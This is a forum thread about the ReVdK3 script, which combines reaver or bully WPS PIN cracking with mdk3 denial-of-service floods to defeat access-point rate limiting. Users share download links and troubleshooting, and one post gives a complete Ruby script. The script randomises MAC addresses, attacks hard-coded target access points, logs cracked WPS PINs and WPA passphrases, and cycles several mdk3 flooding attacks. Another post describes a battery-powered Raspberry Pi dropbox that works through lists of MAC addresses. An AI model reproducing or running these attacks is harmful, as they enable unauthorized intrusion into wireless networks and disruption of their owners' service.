Jump to content

Reaver "AP rate limiting detected" and automatic mdk3 solution


LexMichdeappel
 Share

Recommended Posts

Well, instead of using the gnome terminal, could the terminal invocations be replaced for an openwrt compatible one? Such as screen or tmux, byobu? As I'm still learning, this is beyond my current knowledge to make a working port for openwrt of your nice script! :-)...................... 0E 800 had attempted this and modified your script and named it "ReVdK3-rW.sh", that version is here: https://drive.google.com/file/d/0BzolLN2vKwxjcGNrYmp1cVBFT28/edit...........but there is a want / need for this script to be able to run on other systems that only supply a screen,tmux, byobu etc interfaces

I see your point...I downloaded the modified script done by OE 800..:)...a few patches for it to work with MarkV is not bad..lol... what terminal emulators except tmux is supported in MarkV? :) I will see what i can do...

  • Upvote 1
Link to comment
Share on other sites

That's great news! Also I really like the updated script of hours, been running it in my Kali box :-) but off the top of my head, all I can think of term's supported other than tmux are "screen" , and byobu.

I think "screen" would probably be best suited for this task, but I'm still novice in this area.

Again, great work on your script!

Edit: my noobness is shining through. Byobu is a layer ontop of tmux or screen. So i guess as far as my knowledge goes, is tmux and screen are the only viable ones I know of.

Edited by datahead
Link to comment
Share on other sites

Firstly, this script is great and works wonderfully on my Kali box, so thank you repzeroworld!

I'm trying to get this running on a Raspberry pi now. With any of the MDK3 options I chose I get "No source mac specified" and "Couldn't determine current channel for mon0" when it begins running that part of the script. I specify a channel during the Bully setup, as well as -B.

Bully seems to run fine, but obviously without the benefits of the MDK3 attacks. Is there something I'm missing here because I'm on a Pi? It seems to be waiting for a beacon on channel -1, which is not the channel I set.

I haven't tried this script on my Mark V as that's in use on a longer term project at the moment.

Thanks dudes!

Edited by velkrosmaak
Link to comment
Share on other sites

Firstly, this script is great and works wonderfully on my Kali box, so thank you repzeroworld!

I'm trying to get this running on a Raspberry pi now. With any of the MDK3 options I chose I get "No source mac specified" and "Couldn't determine current channel for mon0" when it begins running that part of the script. I specify a channel during the Bully setup, as well as -B.

Bully seems to run fine, but obviously without the benefits of the MDK3 attacks. Is there something I'm missing here because I'm on a Pi? It seems to be waiting for a beacon on channel -1, which is not the channel I set.

I haven't tried this script on my Mark V as that's in use on a longer term project at the moment.

Thanks dudes!

thanks datahead and velkrosmask

when running your adapter in monitor mode check to see if there are any program such as network managers that automatically bring your wireless adapter interface up. New wifi drivers does not allow you to use your adapter in monitor mode while your wireless interface is up..I think there are patches for drivers around.....however the script executes a piece of code several times to bring your wireless interface down in order to use your monitor interface. Also, probably you can try not to put a channel number so that your adapter can adjust itself to hoping channels to find the right channel the target is on. :D

Link to comment
Share on other sites

  • 4 weeks later...

****************ReVdK3-r2 (Revision 2)********************************

Download Link

http://www72.zippyshare.com/v/82770958/file.html

I have revised the script for those who prefer to use bully wps pin cracker. Now you have two options for pin cracking either reaver 1.4 or bully

Dependency checks:

the program checks to see if you have the following are installed so that the script can function well

[1] reaver

[2] bully (if you are using)

[3] mdk3

[4] aireplay-ng

[5] gnome-terminal

[5] timeout

Possbily the last revision of the script since new access points are getting invulnerable to the attacks...however i will experiment new attacks and see if they are effective for rebooting APs biggrin.png..best of luck ReVdK3 users!..biggrin.png

Credit to my friend WaLkZ and others who prefer bully wps pin cracker

Thank you.. regsitered just to give you thanks for the great script :).

Link to comment
Share on other sites

  • 2 weeks later...

****************ReVdK3-r2 (Revision 2)********************************

Download Link

http://www72.zippyshare.com/v/82770958/file.html

I have revised the script for those who prefer to use bully wps pin cracker. Now you have two options for pin cracking either reaver 1.4 or bully

Dependency checks:

the program checks to see if you have the following are installed so that the script can function well

[1] reaver

[2] bully (if you are using)

[3] mdk3

[4] aireplay-ng

[5] gnome-terminal

[5] timeout

Possbily the last revision of the script since new access points are getting invulnerable to the attacks...however i will experiment new attacks and see if they are effective for rebooting APs biggrin.png..best of luck ReVdK3 users!..biggrin.png

Credit to my friend WaLkZ and others who prefer bully wps pin cracker

Link to comment
Share on other sites

repzeroworld, i have a few questions about the script. I can't get reaver to associate with the ap, it just sits at "waiting for beacon". I've seen other people with this problem, but can't seem to find any solutions. It may be that mon0 doesn't work with my reaver (i usually have -i wlan0) or it might be something with the script as i can run the mdk3 attacks and reaver quite happily by themselves. any help would amazing thanks

Link to comment
Share on other sites

Para resolver o problema de "AP rate limiting....." Realizei o procedimento de:

Deixei dois terminais abertos, um com o Reaver e o outro com o mdk3 rodando os 2 simultaneamente e funcionou. Tentem fazer isso.

Olha o print.

Posta as duas linhas de comando, por favor.

(Put the command lines, please)

Link to comment
Share on other sites

repzeroworld, i have a few questions about the script. I can't get reaver to associate with the ap, it just sits at "waiting for beacon". I've seen other people with this problem, but can't seem to find any solutions. It may be that mon0 doesn't work with my reaver (i usually have -i wlan0) or it might be something with the script as i can run the mdk3 attacks and reaver quite happily by themselves. any help would amazing thanks

give some details on

1. the reaver command line you are using

2. The chipset of your wifi card (try "airmon-ng")

3. Have you bringing wlan0 down and when using the card in monitor interface?

4. check to see what channel the victim is on (try running an airodump-ng scan or using wash)..it could be that you are on the wrong channel expecting to get a beacons

Edited by repzeroworld
Link to comment
Share on other sites

there are all kinds of scripts all over pastebin.

today I have just assembled a reaver Dropbox.

Anker 15000mah

awus036h

Awus036nha

Usb powered hub

And raspberry pi b+ kali installed.

I have wrote 2 scripts. one will simply log how long the battery will last.

and then I have made a script that performs some Reaver attacks on a large list of MAC addresses.

reaver wlan0 mac-from-list

reaver wlan1 mac-from-list

2 access points will be attacked for 5 minutes at a time. then will move onto the next 2 mac addresses in the list with a newly generated mac address.

I like to call this a shotgun blast... ill have to share the script another time. I could set you up with a barebones example script... ruby for the win!

Link to comment
Share on other sites

require 'open3'
#on reboot stuff.

device="wlan2"
channel="8"
ap_mac="4C:60:DE:31:C3:79"
essid="NETGEAR34"
`ifconfig #{device} down`
`iwconfig #{device} mode monitor`
`ifconfig #{device} up`

#will not launch until the While true: at bottem
#reaver attack and log
def reaver(device, channel, ap_mac)
	Thread.start{
	puts "Random mac..."
	Open3.popen3("ifconfig #{device} down")
	Open3.popen3("macchanger #{device} -r")
	Open3.popen3("ifconfig #{device} up")
		Open3.popen3("reaver -i #{device} -vv --dh-small -b #{ap_mac} -c #{channel}"){|i,o,t|
			i.puts("y")  #tell reaver Yes to continue where the attack left off
			while line=o.gets
				#Log all reaver output to a file
				puts line
				log_all=File.open("log_all_#{ap_mac}",'a')
				log_all.puts(line)
				log_all.close

				#100.00% complete
				#Pin cracked in
				#WPS PIN: '12345678'
				#WPA PSK: 'asshole'
				#AP SSID: 'noob'
				# Log success to another file
				if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:")
					success=File.open("sucess_#{ap_mac}",'a')
					success.puts(line)
					success.close
				end
			end
		}
	} #thread.start
end


 


#will not launch until the While true: at bottem
def mdk3(device, channel, ap_mac, essid)
	Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
	Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } }
	Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } }
	Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
	Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
end

#the main reason for this script
# if you let reaver run for to long, it may hang with out any data output (frozen state)... so killall and restart
#just added a few extra dos attacks

#reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6
#reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8
while true

	#reaver(device, channel, ap_mac)
	reaver("wlan2", "6", "20:76:00:1C:D9:C8")
	reaver("wlan0", "8", "4C:60:DE:31:C3:79")

	#run for 10 minutes, then restart
	sleep 10*60
	`killall reaver`

	#mdk3(device, channel, ap_mac, essid)
	mdk3("wlan2", "6", "20:76:00:1C:D9:C8", "myqwest4681")
	mdk3("wlan0", "8", "4C:60:DE:31:C3:79", "NETGEAR34")
	sleep 2*60
	`killall mdk3`

end

So, its something i made real quick... i tried to keep it simple...

you have to modify the while true: loop to work for you...

if you set the options at the top, then you simply need to use this.

reaver(device, channel, ap_mac)

exactly as shown inside the while true loop.

then it will run reaver for 10*60 seconds (ten minutes)

then it will kill reaver and launch some mdk3 attacks for 2 minutes

a new mac is generated before each reaver thread starts.

i could add a if "rate detected" then trigger the mdk3 attack. g2g

Link to comment
Share on other sites

I have changed all url downloaded links

below is the new link

http://www56.zippyshare.com/v/UZrMxTtZ/file.html

Hi, can you pls tell me how to exactly run your script? I am new on this, and i want to try my parent's router (with their permision ofc).

I have kali linux debian 7 and i tried what you said to 100j but after i write that line and drag the file, i press enter and nothing happens.

Also, i have wifislax could this script work on it too?

Link to comment
Share on other sites

Hello repzeroworld,

I have tried both revdk3 revisions and id like to say that you have done a great job. I have a problem, when i run the script and ap gets locked, mdk3 attacks start but router doesn't reboot (ΖTΕ). It runs even with 40000 clients connected! I dont think that is possible so i thought that might be a problem. I have managed to reboot it once by running manually the mdk3 attacks. I think that when we continously run an attack, AP freeze and does not reboot. Can you help me to solve this?

Link to comment
Share on other sites

  • 4 weeks later...

Para resolver o problema de "AP rate limiting....." Realizei o procedimento de:

Deixei dois terminais abertos, um com o Reaver e o outro com o mdk3 rodando os 2 simultaneamente e funcionou. Tentem fazer isso.

Olha o print.

Quais os comandos que você usou amigo?!?!? Ajuda nois ;)

Link to comment
Share on other sites

  • 2 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...